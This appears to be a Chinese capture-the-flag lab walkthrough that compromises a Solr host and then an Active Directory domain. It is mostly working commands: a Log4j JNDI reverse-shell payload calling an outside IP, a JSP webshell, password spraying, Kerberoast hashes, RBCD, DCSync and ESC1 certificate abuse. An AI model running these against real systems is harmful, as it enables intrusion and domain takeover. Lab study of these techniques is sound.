内网渗透技战法-春秋云境Certify靶场
Certify2(RDBC)
- log4j2 jndi
- grc提权
- SMB
- 密码喷洒
- spn
- RBCD
外网
fscan扫
root@VM-0-3-ubuntu:~/m1xian# ./fscan -h 39.98.126.76
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2026-03-29 19:59:10] [INFO] 暴力破解线程数: 1
[2026-03-29 19:59:10] [INFO] 开始信息扫描
[2026-03-29 19:59:10] [INFO] 最终有效主机数量: 1
[2026-03-29 19:59:10] [INFO] 开始主机扫描
[2026-03-29 19:59:10] [INFO] 有效端口数量: 233
[2026-03-29 19:59:11] [SUCCESS] 端口开放 39.98.126.76:22
[2026-03-29 19:59:11] [SUCCESS] 端口开放 39.98.126.76:80
[2026-03-29 19:59:11] [SUCCESS] 服务识别 39.98.126.76:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2026-03-29 19:59:11] [SUCCESS] 端口开放 39.98.126.76:8983
[2026-03-29 19:59:16] [SUCCESS] 服务识别 39.98.126.76:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2026-03-29 19:59:21] [SUCCESS] 服务识别 39.98.126.76:8983 => [http] 产品:Apache Solr Banner:[HTTP/1.1 302 Found.Location: http://172.22.9.19:8983/solr/.]
[2026-03-29 19:59:21] [INFO] 存活端口数量: 3
[2026-03-29 19:59:21] [INFO] 开始漏洞扫描
[2026-03-29 19:59:21] [INFO] 加载的插件: ssh, webpoc, webtitle
[2026-03-29 19:59:21] [SUCCESS] 网站标题 http://39.98.126.76 状态码:200 长度:612 标题:Welcome to nginx!
[2026-03-29 19:59:21] [SUCCESS] 网站标题 http://39.98.126.76:8983 状态码:302 长度:0 标题:无标题 重定向地址: http://39.98.126.76:8983/solr/
[2026-03-29 19:59:22] [SUCCESS] 网站标题 http://39.98.126.76:8983/solr/ 状态码:200 长度:16555 标题:Solr Admin
[2026-03-29 19:59:40] [SUCCESS] 扫描已完成: 5/5
有log4j2,打jndi
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 175.27.229.115 -l 1599 -p 8087
http://39.98.126.76:8983/solr/admin/collections?action=${jndi:ldap://175.27.229.115:1599/Basic/ReverseShell/175.27.229.115/2333}&wt=json
成功反弹shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
grc可以sudo提取
sudo grc --pty /bin/sh
找到工作目录solr-webapp/webapp
在此写个冰蝎马,不过solr不支持
echo "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%\!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>" > ./solr-webapp/webapp/a.jsp
直接root上线
内网打点
root@ubuntu:/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:29:96:d6 brd ff:ff:ff:ff:ff:ff
inet 172.22.9.19/16 brd 172.22.255.255 scope global dynamic eth0
valid_lft 1892154834sec preferred_lft 1892154834sec
inet6 fe80::216:3eff:fe29:96d6/64 scope link
valid_lft forever preferred_lft forever
fscan
[2026-03-29 21:19:19] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.7
主机名: XIAORANG-DC
发现的网络接口:
IPv4地址:
└─ 172.22.9.7
[2026-03-29 21:19:19] [SUCCESS] 网站标题 http://172.22.9.19 状态码:200 长度:612 标题:Welcome to nginx!
[2026-03-29 21:19:19] [SUCCESS] 网站标题 http://172.22.9.7 状态码:200 长度:703 标题:IIS Windows Server
[2026-03-29 21:19:19] [SUCCESS] 网站标题 http://172.22.9.47 状态码:200 长度:10918 标题:Apache2 Ubuntu Default Page: It works
[2026-03-29 21:19:20] [SUCCESS] 目标: http://172.22.9.7:80
漏洞类型: poc-yaml-active-directory-certsrv-detect
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/EasonJim/p/6859345.html
[2026-03-29 21:19:19] [SUCCESS] NetBios 172.22.9.7 DC:XIAORANG\XIAORANG-DC
[2026-03-29 21:19:19] [SUCCESS] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[2026-03-29 21:19:19] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.26
主机名: DESKTOP-CBKTVMO
发现的网络接口:
IPv4地址:
└─ 172.22.9.26
[2026-03-29 21:19:19] [SUCCESS] SMB认证成功 172.22.9.47:445 administrator:123456
[2026-03-29 21:19:19] [INFO] 系统信息 172.22.9.47 [Windows 6.1]
[2026-03-29 21:19:19] [SUCCESS] NetBios 172.22.9.47 fileserver Windows 6.1
[2026-03-29 21:19:19] [INFO] SMB2共享信息 172.22.9.47:445 administrator Pass:123456 共享:[print$ fileshare IPC$]
[2026-03-29 21:19:20] [SUCCESS] 网站标题 http://172.22.9.19:8983 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.9.19:8983/solr/
[2026-03-29 21:19:20] [SUCCESS] 网站标题 http://172.22.9.19:8983/solr/ 状态码:200 长度:16555 标题:Solr Admin
172.22.9.47
172.22.9.47存在SMB 共享
连接
proxychains smbclient -L 172.22.9.47
或者proxychains python3 smbclient.py 172.22.9.47
查看共享文件
smbclient \\\\172.22.9.47\\fileshare
dir
get personnel.db
get secret\flag02.txt
get personnel.db
personnel.db里有账号和密码,导出后接下来密码喷洒
SELECT password FROM xr_users INTO OUTFILE '/tmp/pass.txt';
SELECT name FROM xr_members INTO OUTFILE '/tmp/user.txt';
喷洒172.22.9.26和172.22.9.7
proxychains crackmapexec smb 172.22.9.26 -u user.txt -p pass.txt --continue-on-success
或者
proxychains hydra -L user.txt -P pass.txt 172.22.9.26 rdp >>result.txt
cat result.txt|| grep account
····
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [+] xiaorang.lab\zhangjian:i9XDE02pLVf
rdp失败,PTH也失败
# wmiexec 命令执行
proxychains python3 wmiexec.py xiaorang.lab/zhangjian:'i9XDE02pLVf'@172.22.9.26
尝试Kerberoasting攻击
proxychains python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
┌──(root㉿kali)-[~/Desktop/tools]
└─# proxychains -q python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 12:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 12:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$339ece90fdcbd1a4bfc9c308100da948$7ba507865929f712ed725bca46d49c397000934e89af3279356e24ee1be8ef0fa91125a1476d9938813f8699af27afee61cec86ec80777c3271156f2b53c4e0c01954217c9d28a1edc69b0406d918325c660a343285197300142184d104dbb42df8d1302cc7ecfc532845a5dec4221ee5040188edd9503260b841cccbc25228d084d83314704cb2372cf407c62460a01cf76faae6c87db73ca618e555876ff232245fb6a58ca57d21d4d66f43dc2209b7340d6283789f4f9f01e00e6fb498d935e635d199e69e5c7262f2d14c5410744ebfd1019ac893b6f90f53477dd0836de23099922472cbf0284b5df764acb83165d8aee4440cc9f3fcd7ca71842e69de45225e4a387dcd262a41e2e3ee00217fa2ab9758b53bd99746189618bb962dd8eeee5861080bdd4633f7159836516637e1bc7e9c5a2dfbcb8043ae84547e6f89beac930a5c39563d126793f310d3bb7fd16e360957176c262fd0e21064f5363264c8b9ac35ab5d69cad052b36429fe6c8bd99ffba692f98c35c59127561b89080f0e53ad8cb21f1f61b7c2b1d54ed376b2b7d33077c09b33105896d213cf49c2733f50e6611021f7b635d6e651e2795ddc13cf44a9541422c7a236aa6ba457b2b037105c72495333cca242a50f1279fcdc7886d7cefecf4766d077e229167b9a369db0c2e69040109f6793223c4291bd6a79148722d34f7e7de28ad0c95feb91bb10060f54327fee0507b95ee91984bbd4742ec2561b0b0b454cafd4e113eca42b8fce5fd0cc659d1d470bd76f8219ace570d385b89c778b66a49f0e031997ed6b02a00d7f50b669aaba27ec68cf5556bcab7d7617e58fed19271e99cb8843c934fbef06dd3b28376c7220830b501770e6e742949458e9a82fb58dfc1a9ba71f290818de5f8c699baa279a3a7d31229a934292a6189bb2a4834f4c0e185c2e2831e5379a5c791d04d70b7e4dc5d7898d6fbe34724132c9c978c4eac4f5313db92a96294d0ee94a2c96797df9945551492596ba1734c2b5fa739dbe44e54bdb8502d1fca0c9113d6232c5bf459063635609040fb1413e2b2ff64026ea236d63691ecbfefbb78facd56b1034bcbf9ef13bb6615fdc7f9ef5e6f6d5142322bfaae019398debea542151cd1ea23c69fb5d08d08b4e0d76d107c2a830123cce36bf9720f80f9b0f68e128b60ea55e7bbecbe18d30e2305d8bce9707f51d0eab8123ec10afe09b314d9a4b40b1d09354de2583be4ec2283a538787f758962feee298cf3d10a2a6f945fe525904d01f2266a0f5c1c65dbf9a37953eae959c67f5fcac1e7e405b1daf71be6e19f9df133bca0dc34f2ad7d24abd2cfeb73c775288f98e7147d143f85c00479527aa0da3dbb1b5bc250516cc1644143d7a4f7d7d220d5c85bc437a3a5910230d75dea99be65fe5afe76983216fe5d8b309ba4108ce33c9f300122cd6664877cf8702204cf8409811b08294c6f583c6174e0481eab63c7571de03b4ba91058fad5dd89fa4cdb99
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$0ed92d7721a3caa72c4cde562a94e254$39ab857ca9a000704d34644866030dc6c125eb218140498bbfdbd8220189489eb02b898a66d86620ab141968d6237e15556e133c909fc2fd582baded556430f4f1b157f94745cc8d56cd6b9b408d96401304a2e140751d30c70c106aa2ca06476d0d09079d8e8907245a594ca082dc13333f57cbb3e7e46f9f88ffa4f7b2bd649400f555692dfe33ffeb00ea189631aaabe273790a158d2406078e3edf7129b95b823359569630e24cb6c62cfeadeccbc740b0b05a845603f6ec1ea7580054e5fff3e8b6e1826d9438e6d9fb4f09e123a62c3363727853d5969c4aec049ca43082dca8ca014be0e3f9fb61c9355b90a962618f98f828aa8338b55a2420add997b795d47f325b5828c607b42c60656e72765e944dc6a13c4f781bb9ecc3d46dff0299fc4658b893c4b969e3d9590cc65a527c947c71b0411efcacabf59447424df66feba887236017fa51c4070e9470fb7b9b6fca0dc5f0d5a7b5fdde75081906b1a29db09201c9a69d69a412cf88b284ed3ddad16087ab06f83359e5113207bab5f8121a095c570d4289140eabb2e55476719905979658d1fcde61eeb683f81afa0e67e0cb13b3f5c0da6618c0bff78e34c0c03555239f5d2333d22d4a9f2146eca5a6c2f62e637207fdffc71d02518554c982b4e310c29a98598085c261dcd31cb1fbcecc36f4acb65d458ae08b7435a98fda3d8e36d791d7cfa57b14ce2c0fb87c3274811cbec6e2bac4a95ae95419e8edad6b4025ec5fe2c66425865c83752de7ed96dd196cfd9cd97389045932d587278c842c534d4036b9df4f0e2952d003e5bb4c65c685552dd4f28da5e4774fe693469b08e2aa217dacaee90619000285818d2d874018aec4c1bd7473f467cebb1643139e6c91ff6d0b47c3259c6b8a5dcc0ece39bf82667357846773df0dc17a0777b399b9d584625cb78c0e744dc58e29b032991fa2400dfbe8fd6a8fa80af96303f322e50c922def47009485974993ae960a67cb8bb0afb133507a55068dd4e36af3466ceb88eda30cd1cc98c6cc68bb44849b52caa87a0a94b1a5e5312fdea2312d107d16df78e2f8eacd70fa25affe757e9dc5ee6ce234ca7cc64b20fc9e6e14f2336914133a46d466d58426659c62dfddf07586c33028108172e18fd16163fdfb7286e998a15d26b8a08bc96c54df323526128f4a385dded0662e2a8e80689a2e94204d0be3bd4b970ea28eef8e6ddc961abe948a44fa753d9732deb138fb1009d3621493fd3f4fee25ea2a278e0df6d6bf320dc1203e8e577dc44c1ae881decb5b103cc1d48b8c6e41b9eeccf8ecaac2ece2f418f4026cc12002cf4fcfd2c59b7b5ff9ffd33e47d562349f46cd301d45405580b3797e7dc825954fc2e0861b9d07fa11ce99d900bc419ffc8c0e5e040d3228591e079f91a99b5b245eb84db6009143c356728e010f4b10461e49106e227b8f845f46c5005d034107cc8c68ee4355c58132113a768cbe48d8c75fb534356cff357aa1f30658dca7
之后完整保存到a.txt
hashcat.exe a.txt
符合13100
F:\hashcat-6.2.6\hashcat.exe -m 13100 a.txt rockyou.txt --force --self-test-disable
xiaorang.lab\zhangxia MyPass2@@6
xiaorang.lab\chenchen @Passw0rd@
9.27两个账号都没登陆成功9.26成功rdp登录
传SharpHound.exe收集
可以打RBCD,查一下确实有GenericWrite权限
C:\Users\zhangxia\Desktop>powershell -exec bypass Import-Module .\powerview.ps1;Get-DomainUser -Identity zhangxia -Properties objectsid
objectsid
---------
S-1-5-21-990187620-235975882-534697781-1185
C:\Users\zhangxia\Desktop>powershell -exec bypass -c "Import-Module .\powerview.ps1;Get-DomainObjectAcl -Identity XIAORANG-DC | ?{$_.SecurityIdentifier -match 'S-1-5-21-990187620-235975882-534697781-1185'}"
ObjectDN : CN=XIAORANG-DC,OU=Domain Controllers,DC=xiaorang,DC=lab
ObjectSID : S-1-5-21-990187620-235975882-534697781-1000
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131132
SecurityIdentifier : S-1-5-21-990187620-235975882-534697781-1185
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
powershell -exec bypass Import-Module .\powerview.ps1;Get-NetComputer -Identity WIN2035
sid是S-1-5-21-990187620-235975882-534697781-1213
C:\Users\zhangxia\Desktop>hostname
DESKTOP-CBKTVMO
powershell -exec bypass -Command "& {
Import-Module .\powerview.ps1;
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList 'O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-990187620-235975882-534697781-1213)';
$SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0);
Get-DomainComputer 'DESKTOP-CBKTVMO.xiaorang.lab' | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
}"
之后用rebues攻击
Rubeus.exe hash /user:WIN2035 /password:win2035 /domain:xiaorang.lab
8FF0F159490DA3E29F00194B042D6ED0
Rubeus.exe s4u /user:WIN2035$ /rc4:8FF0F159490DA3E29F00194B042D6ED0 /impersonateuser:administrator /msdsspn:cifs/XIAORANG-DC.XIAORANG.LAB /dc:XIAORANG-DC.XIAORANG.LAB /ptt
dir \\XIAORANG-DC.lab
申请ldap票据,后续进行DCSync
Rubeus.exe s4u /user:WIN2035$ /rc4:8FF0F159490DA3E29F00194B042D6ED0 /impersonateuser:administrator /msdsspn:ldap/XIAORANG-DC.XIAORANG.LAB /dc:XIAORANG-DC.XIAORANG.LAB /ptt
mimikatz.exe "lsadump::dcsync /domain:XIAORANG.LAB /user:krbtgt" "exit"
也可以打ESC1
proxychains certipy find -u 'liupeng@xiaorang.lab' -password 'fiAzGwEMgTY' -dc-ip 172.22.9.7 -vulnerable -stdout
Certificate Authorities
0
CA Name : xiaorang-XIAORANG-DC-CA
DNS Name : XIAORANG-DC.xiaorang.lab
Certificate Subject : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Certificate Serial Number : 43A73F4A37050EAA4E29C0D95BC84BB5
Certificate Validity Start : 2023-07-14 04:33:21+00:00
Certificate Validity End : 2028-07-14 04:43:21+00:00
Web Enrollment : Disabled
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Certificate Templates
0
Template Name : XR Manager
Display Name : XR Manager
Certificate Authorities : xiaorang-XIAORANG-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Authenticated Users
Object Control Permissions
Owner : XIAORANG.LAB\Administrator
Write Owner Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
Write Dacl Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
Write Property Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
[!] Vulnerabilities
ESC1 : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
然后修改加一下vim /etc/hosts
172.22.9.7 XIAORANG-DC.xiaorang.lab
172.22.9.13 CA01.xiaorang.lab
首先利用XR Manager模板为域管请求证书
proxychains certipy req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab

接着转换格式,请求TGT,DCSync或者PTT
proxychains certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7

拿到域管哈希,pth一下即可
proxychains python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7 -codec gbk


浙公网安备 33010602011771号